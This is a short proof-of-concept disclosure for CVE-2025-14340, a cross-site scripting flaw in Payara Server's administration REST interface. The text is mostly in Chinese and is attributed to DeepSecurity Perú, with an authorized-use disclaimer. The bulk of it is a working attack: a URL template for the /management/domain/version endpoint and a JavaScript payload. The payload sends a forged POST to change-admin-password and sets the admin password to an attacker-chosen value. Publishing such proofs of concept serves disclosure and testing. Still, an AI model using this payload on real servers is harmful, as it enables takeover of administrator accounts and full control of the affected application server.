
PoC for CVE-2025-14340: Admin account takeover in Payara Server
Payara 的管理 REST 接口(Administration Rest Interface)中存在一个跨站脚本(XSS)漏洞,允许执行攻击者控制的 JavaScript,从而导致管理员账户被接管。原因如下:
/management/domain/version 中的 XSS 注入的脚本可以向 /management/domain/change-admin-password 发送 POST 请求,并为任意目标账户设置攻击者选择的密码——从而导致管理员账户被接管。URL:
https://panel.example.com:4848/management/domain/version?<PAYLOAD>
载荷(PAYLOAD):
<script>
fetch('/management/domain/change-admin-password', {
method: 'POST',
headers: {
'X-Requested-By': 'GlassFish REST HTML interface',
'Accept': 'text/html',
'Content-Type': 'application/x-www-form-urlencoded'
},
body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>
仅限授权使用。DeepSecurity Perú 不认可未经授权的访问,并且对滥用所提供信息的任何行为不承担任何责任。